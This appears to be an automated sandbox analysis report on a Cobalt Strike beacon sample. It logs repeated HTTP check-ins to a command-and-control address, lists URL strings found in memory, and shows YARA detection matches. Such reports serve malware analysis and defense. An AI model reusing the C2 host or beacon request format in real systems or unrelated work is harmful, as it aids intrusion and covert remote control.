            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1909421925.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2620871241.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cm
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cm.d
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cm54.116:7810/cm
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cm54.116:7810/cmay
            Source: P3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmD
            Source: P3KxDOMmD3.exe, 00000000.00000003.3498905059.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmN
            Source: P3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmP
            Source: P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1926499944.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmV
            Source: P3KxDOMmD3.exe, 00000000.00000003.2603494375.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmVA
            Source: P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmX
            Source: P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmZ
            Source: P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmc
            Source: P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmh
            Source: P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmj
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmk.3v
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmk.py
            Source: P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2638951717.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2492373736.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.4084894276.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmp
            Source: P3KxDOMmD3.exe, 00000000.00000003.2876116472.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmq
            Source: P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmr
            Source: P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmu
            Source: P3KxDOMmD3.exe, 00000000.00000003.3720845976.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmuj
            Source: P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmx
            Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmxP
            Source: P3KxDOMmD3.exe, 00000000.00000003.2620871241.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmxu
            Source: P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1892519888.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.116:7810/cmy

            System Summary

            barindex
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
